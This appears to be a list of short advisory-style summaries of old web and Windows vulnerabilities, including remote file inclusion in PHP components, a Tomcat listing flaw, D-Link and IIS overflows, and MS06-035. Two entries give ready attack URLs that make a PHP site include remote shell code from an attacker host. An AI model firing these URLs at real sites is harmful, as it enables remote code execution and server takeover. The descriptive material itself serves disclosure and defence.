This bug allows a remote attacker to execute commands via Remote File Include (RFI). The vulnerable path is ?mosConfig_absolute_path= and the exploit is http://web/components/com_moodle/moodle.php?mosConfig_absolute_path=http://shell.txt
Articles One is prone to a remote file-inclusion vulnerability because it fails to sufficiently sanitize user-supplied input. An attacker can exploit this vulnerability to include arbitrary files from remote Web servers that may contain malicious code and execute it in the context of the Web server process.
MoSpray is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input. An attacker can exploit this issue to execute arbitrary PHP code within the context of the webserver process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible.
Apache Tomcat can be forced to reveal a complete directory listing for any directory by requesting a mapped file extension prepended with a semicolon, a reserved character. The file does not need to exist.
Some variables are not properly sanitized before being used. Here you will find the variables not properly sanitized: help.php?css_path=htt://attacker setup/header.php?css_path=htt://attacker
A remote stack overflow exists in a range of wired and wireless D-Link routers. This vulnerability allows an attacker to execute privileged code on an affected device. Although a stack overflow does exist, debugging this vulnerabilty requires additional external hardware.
A vulnerability exists in phpforge3b2(cfg_racine) which allows an attacker to include a remote file by manipulating the 'cfg_racine' parameter in a vulnerable URL. An attacker can exploit this vulnerability to execute arbitrary code on the vulnerable system with the privileges of the webserver process.
This exploit is used to exploit a vulnerability in Microsoft SRV.SYS Mailslot Ring0 Memory Corruption (MS06-035). It uses a series of crafted packets to send to the target system, which can lead to a denial of service or remote code execution.
This exploit is a stack overflow vulnerability in Microsoft IIS ASP. It allows an attacker to execute arbitrary code on the vulnerable system by uploading a malicious ASP file. The exploit was tested on Windows 2000 Server SP4+IIS5.0 and Windows 2003 Server+IIS6.0.
This exploit takes advantage of a stack based overflow. Once the stack corruption has occured it is possible to overwrite a pointer which is later used for a memcpy this gives us a write anything anywhere condition similar to a format string vulnerability.